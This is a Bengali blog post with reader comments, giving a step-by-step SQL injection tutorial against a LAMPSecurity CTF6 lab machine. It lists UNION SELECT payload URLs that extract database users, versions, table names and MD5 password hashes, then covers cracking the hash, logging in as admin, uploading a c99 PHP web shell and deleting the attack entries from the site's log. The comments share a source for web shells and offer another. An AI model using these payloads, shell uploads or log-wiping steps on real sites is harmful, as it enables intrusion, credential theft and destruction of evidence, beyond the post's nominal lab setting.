আসসালামু আলাইকুম, সবাইকে আজকের টিউনে স্বাগতম কেমন আছেন সবাই? আশা করি সবাই ভাল আছেন আজ আপনাদের সামনে হাজির হয়েছি আরেকটি হ্যাকিংয়ের টিউন নিয়ে আমি হ্যাকিং পারি না তবুও একটু আধটু আপনাদের সাথে দেখি পারি কিনা শেয়ার করতে আজকের টিউনের নাম, “এডভান্সড SQL হ্যাকিং টিউটোরিয়াল”
আগেই বলে নিই যে, আমি এটি হ্যাকিং করি নি এই টিউটোরিয়ালটির Credits—-> Coded32, Mantra Security, LAMP Security, C99 shell Creator, Abhi_M, Limerick, Evil, Srchasst, BrandonMXB, DSG – Dragon Slayer Guy, N3t
!i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i
হ্যাকিং শুরু করার আগে আপনাকে কয়েকটা জিনিস আগেই নিতে হবে —–>
Mantra Security Toolkit=
লিনাক্সের জন্য ডাউনলোড লিংক (৩২ বিট) অথবা ডাউনলোড লিংক (৬৪ বিট)
উইন্ডোজের জন্য ডাউনলোড লিংক
এ্যাপলের জন্য ডাউনলোড লিংক
একটি vulnerable ওয়েব সাই্ট। আমি একটি মডিফাই ভার্সন ব্যবহার করেছি, সেটা হল LAMPSecurity CTF6
যে কোন PHP Shell যেটা আপনি পচন্দ করেন। যেমন- Google for “c99 shell” আমার মতে Team Nuts এর Devil shell এটাই ঠিক।
এবার কাজ শুরু হবে
আপনি আপনাদের একটি ওয়েব সাইট দিলাম। আপনারা যদি পান, তাহলে তো ভাল কখা।
http//192.168.132.128/
আমি ওয়েবসাইটটির প্রত্যেকটি পাতায় গেলাম ও নিচের URL টি দেয়ার সাথে সাথে একটা পৃষ্ঠা পেয়ে গেলাম।
http//192.168.132.128/?id=13
এবার F9 চেপে হ্যাকিংয়ের বারটি চালু করুন।
এবার আমি ওয়েব সাইটটির vulnerable পরীক্ষা করতে লাগলাম।
এবার লিংকটি সবার শেষে একটি ( ‘ ) দিলাম। যেমন-
http//192.168.132.128/?id=13’
এবার যেহেতু নতুন পাতাটি আগের পৃষ্ঠা থেকে ভিন্ন, তাই্ আমি নিশ্চিত হয়ে গেলাম যে এটা একটি vulnerable ওয়েবসাইট।
তাহলে এবার আপনি এখন বুঝেগেছে যে একটি vulnerable ওয়েবসাইট কেমন হতে পারে।
এবার নিচের লিংকটি লিখে এন্টার করুন।
http//192.168.132.128/?id=13 order by 1
আপনাকে শেষের সংখ্যাটি মনে রাখতে হবে। যাতে আপনি পরবর্তীতে পৃষ্ঠা পরিবর্তন করতে পারেন।
এবার এড্রেস বারে নিচের কোডটি টাইপ করে এন্টার করুন।
http//192.168.132.128/?id=13 order by 7
কোন পরিবর্তন ছাড়াই্ আমি ৭ এর চলে গেছি।
http//192.168.132.128/?id=13 order by 7
এবার আমরা Injection এর মাধ্যমে ৮ এ পরিবর্তন করবো। তাই্ আমরা ওয়েব সার্ভার হ্যাক করার পথ এখন খুঁজব। P
http//192.168.132.128/?id=13 order by 8
এবার সামনের দিকে এগিয়ে চলুন ও UNION statement তৈরি করুন। আমি শুধু SQL > UNION SELECT STATEMENT এখানে গিয়েছি।
এবার আমি টেবিলের সংখ্যা দিলাম। যেহেতু আমি ৮ পৃষ্ঠায় একটি ভিন্ন একটি পৃষ্ঠা পেয়েছিলাম, আমি নিশ্চিত যে, ৮ টাতে টেবিল ঠিক মতো নেই এবং সেখানে মাত্র ৭টি টেবিল আছে।
বাহ! আমি কিছু নাম্বার পেয়ে গেছি এই পাতায়। যেগুলো vulnerable columns. এখান থেকে ২ নিন।
http//192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
এবার আমি নাম্বার ২ দিলাম লিংকটিতে ও আরেকটি SQL কমান্ড দিলাম। আমি এটা কার্যকর পেয়েছিলাম এবং এই পৃষ্ঠার ফলাফলও পেয়েছিলাম।
http//192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
এটার বর্তমা ইউজার হল [email protected]
এবার আমরা এর database ভার্সন খুঁজে বের করব। এবার আমি ২ এর জায়গায় version() ব্যবহার করলাম।
http//192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
এর ডাটাবেজ ভার্সন পেলাম 5.0.45
এবার আমার টেবিল তালিকা দেখুন।
http//192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
আমি এই তালিকা থেকে “user” নামে একটি মজার টেবিল পেলাম। এবার আমি সকল কলামের তালিকা করলাম।
http//192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
আমি “user” টেবিল থেকে কলাম চেয়েছিলাম কিন্তু দেখি কিছুই নাই।
http//192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=’user’
এবার ইউজার নেম খুঁজে বের করব।
http//192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
এবার পাসওয়ার্ড কি?
http//192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
এটা দেখি এনক্রিপ্ট করা, এবার পাসওয়ার্ডকে Decrypting করলাম।
এবার আমি MD5 hash টি কপি করলাম। এবার হ্যাসটিকে hackbar এ পেষ্ট করলাম।
এবার এখানে গেলাম Encryption > MD5 Menu > send to > md5.rednoize.com
ওহো!!! আমি পাসওয়ার্ড পেয়ে গেলাম।
এবার লগইন পেজ খুঁজে বের করুন।
এটা আমার সামনেই আছে ঠিক, কিন্তু এটা আমার অন্যন্যা ক্ষেত্রেও আপনাকে এটা খুঁজে বের করতে হবে।
সবকিছু এখন ব্যাখ্যা দেয়া সম্ভব নয়, আপনি ভাল ভাবে একটু গবেষণা করুন যে, কিভাবে হ্যাকারা কাজ করে ও অনুসন্ধান করে।
আপনি একটু আগে যেটা পেয়েছেন, সেটা দিয়ে লগইন করুন।
সাবাস!!!!!! লগইন করে পেলেছে, আপনি এখন এই সাইটের এডমিন। হু হু হু হু হু হা হা হা হা হা হি হি হি হি হি
এবার আমি একটি আপলোড করে দিলাম।
এবার দেখুন এটি আপনাকে কোন শেল আপলোড করতে দেবে না।
এবার আমরা একটি “Add Event” বাটন যোগ করব।
সুন্দর!!! এটি আপলোড করতে দিচ্ছে।
আসুন যেখানে শেল আপলোড পেয়েছিলাম দেখুন
এখন আমরা ডিফল্ট আপলোড স্থান পেতে চেষ্টা করব।
এবার আমি দেখেন পেরেছি। এবার c9shell.php ফাইলটিতে ক্লিক করুন, যেটা আমি একটু আগে আপলোড করে ছিলাম।
বাহ আমি shell এ প্রবেশ করতে পেরেছি।
এবার আমি সবচেয়ে উপরের বাটনে ক্লিক করছি, যাতে root folder টি পেতে পারি।
এবার আপনি আপনার ইচ্ছা মতো যা ইচ্ছা তাই করতে পারবেন। আপনি ইচ্ছা করলে পুরা ওয়েবসাইটটি মুছে ফেলতে বা কোডিং পরিবর্তন বা যা ইচ্ছা তাই করতে পারবেন।
এবার log folder >>>log.log ক্লিক করুন ও এটা হল আমার SQL injection attacks এর মূল লগ ফাইল।
এবার এটিতে যান ও লগ ফাইলটি এডিট করুন।
এবার আমি আমার পুরা লগ এন্টিগুলো ডিলিট করে দিই। এবার এটি সেভ করুন। বাহ! লগ ফাইলটি খালি হু হু হু হু হা হা হা হা হি হি হি হি
এবার Self Remove এ ক্লিক করে c99 shell টি মুছে ফেলুন। সাবাস!!
Good Bye C99
আমি আপনাদের আগেই বলেছি যে, আমি হ্যাকার না। তবুও আপনাদের কিছু শিখানোর জন্য মাঝে মাঝে হ্যাকিংয়ের উপর টিউটোরিয়াল লিখতে চেষ্টা করি। হয় না, তবুও চেষ্টা আর কি P সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ…………
হু হা হা হাউ
কি আকটা ওবোসটা
ফাটাফাটি ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
হ্যাকিং দেখলে সবসময় আগ্রহ নিয়ে দেখি। যদিও ঐকাজে এখনো পা দিইনি এবং দেয়ার ইচ্ছাও নেই। তবে আগ্রহ আছে কিভাবে কাজটি হ্যাকাররা করে। পোস্টটিতে যথেষ্ট তথ্য এবং শেখার কৌশল রয়েছে। সবচেয়ে মজা লাগল ধারাবাহিক বর্ণনা পড়ে। খুব সুন্দর এবং গোছালো লেখা। দারুন!
Viah, J Kono website a “shell” upload korar moto kono system na thakle. ki Vabe Upload korbo???? Plzz Viah system Bolla Valo Hoto…………………
ut vai gr9 tune…….prio te nilam
রাসেল ভাই হ্যাকার হয়ে হারালেন কোথায় ?
মনে হয় ধীরে ধীরে হ্যাকার হয়ে যাচ্ছি ! কি সর্বনাশ ! অনির্বাচিত ভাইরে তো গ্রেফতার করা দরকার বলেই মনে হচ্ছে ;)
হে হে, না আরেকটু শিখা নেই তার পরে দেখতাছি !
আপনারা শিখে আমাকে গ্রেফতার করাবেন :( আমি কিন্তু কেঁদে দিলাম। আপনি বলেন কাঁদব কিনা??????? :P
ভাই হ্যাকিং মনেহয় শিখিয়ে চারবেন । । ধন্যবাদ আরেকটু এগিয়ে গেলাম হ্যাকিং সঞ্চোদে । । অনেক অনেক ধন্যবাদ । । ।
ভয় পাইছি, ধন্যবাদ ভাই আপনাকে
অনির্বাচিত টিউনার ভাই আপনাকে অনেক অনেক ধন্যবাদ :-) :-D :-) :-D ভালো থাকবেন।
আমি All time happy and hits :D :D D :D :D :D
তাতো আমি জানি!!! :-) :-D :-) :-D
অনির্বাচিত টিউনার ভাই জটিল মারত্তক ও বিশাল তথ্যবহুল একটি টিউন। আমি হ্যাকার হওয়ার আর কিন্তু বেশী দিন নাই!!!
এই তো আপনি হ্যাকার হ্চছেন। সাবাস! সাবাস!! সাবাস!!! চালিয়ে যান। আপনার কাছে একটা অনুরোধ প্রথম দফায় আমার পিসি হ্যাকিং করবেন! :D :D :D :D :D :P :P :P :P
বেশি বেশি পড়াশুনা করতে হবে
আমার মাথায় ধুকেনা চেষ্টা করি কিছুই পারিনা
সব কিছু কি আপনি সাথে সাথেই পেরেছেন? না। আস্তে আস্তে করে শিখতে হবে। আর যে বই গুলো আপনাদের দেয়া হয়েছে, ওগুলো আস্তে আস্তে পড়তে থাকেন। পারবেনই, ইনশাআল্লাহ
অবসরে বই পড়ি আড্ডাও দেয়া হয়না, কেমন যেন ঘর কুনে হয়ে গেছি …………
বাবারে বাবা জটিল টিউমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমমম।হিহি।
অনেক জোসসসসস
অনির্বাচিত টিউনার ভাই এইটা কি দেখাইলেন ? ভয় পাইছি ।খুব,খুব,খুবই সুন্দর হইছে । আচ্ছা বাকি টুকু তো আর বললেন না।অই সাইট টা কি এখন আপনার ? আপনি কি অইটা ব্যবহার করেন ?
আগেই বলে নিই যে, আমি এটি হ্যাকিং করি নি এই টিউটোরিয়ালটির Credits—-> Coded32, Mantra Security, LAMP Security, C99 shell Creator, Abhi_M, Limerick, Evil, Srchasst, BrandonMXB, DSG – Dragon Slayer Guy, N3t
২য় প্যারাতেই বলেছি, ধন্যবাদ…………………….. তবে টিউটোরিয়ালটি আমি লিখেছি
দুঃখিত আমি খেয়াল করি নাই । তবে টিউন তা কিন্তু আসলেই চরম হইছে ।আচ্ছা আপনারা মন্তব্যে স্মাইলি দেন কীভাবে ? আমি পারি না।
বুঝলাম না এটা দিয়ে কি কি হ্যাক করা যায়???????
hehehe…keno ?ID= ase je site gulai oi gula…bttt ase jodi site a error thake…
হি হি হি আমিও হ্যাকিং এর জন্য প্রস্তুত, দোয়া করবেন কেমন???
বিশাল তথ্যবহুল টিউন! আপনি অত্যন্ত সুন্দর ভাবে উপস্থাপনা করেন অনির্বাচিত টিউনার ভাই। তাই আপনার পোস্টগুলো আমার খুব ভাল লাগে।
হ্যাকিং ক্লাসের প্রস্তুতি চলছে। আপনারা এগুলো নিয়ে যা পারেন অনুশীলন করতে থাকেন, ক্লাস শুরু হলে ঠিক ভাবে বুঝবেন :D
আমি প্রস্তুত।
হুম, খলি তো প্রস্তুত হতেই বলেন, কবে শুরু হবে ?
ইনশাআল্লাহ ঈদের পরই শুরু হবে :D :)
আমিও প্রস্তুত
Vai, khub sundor tune korchen. New der onek kaje asbe. Jader c99shell or any php/asp shell lagbe ei link e peye jaben asa kori. http://t00ls.org tobe eikhane devil shell nai. Amar url ta o m0ne nai. Devil shell karo lagle amar sathe jogajog korte paren. http://facebook.com/groups/bdcyberarmy
mantra google e search dile e pawa jabe. 32MB er besi hote pare.
মারুফ আলম ভাই আমিও তো http://facebook.com/groups/bdcyberarmy ও BCA এর সদস্য হিসেবে আছি :D
আমিও আছি ! হে হে তয় অনির্বাচিত টিউনার ভাইরে তো কখনো দেখলাম না !
আমি সব সময়ই আছি। আপনাদের সাথে কথাও হয় :P :D :D :D
ut vai apni facebook a ki name asen?jodi mind na koren tobe link ta ki share korben…i will add you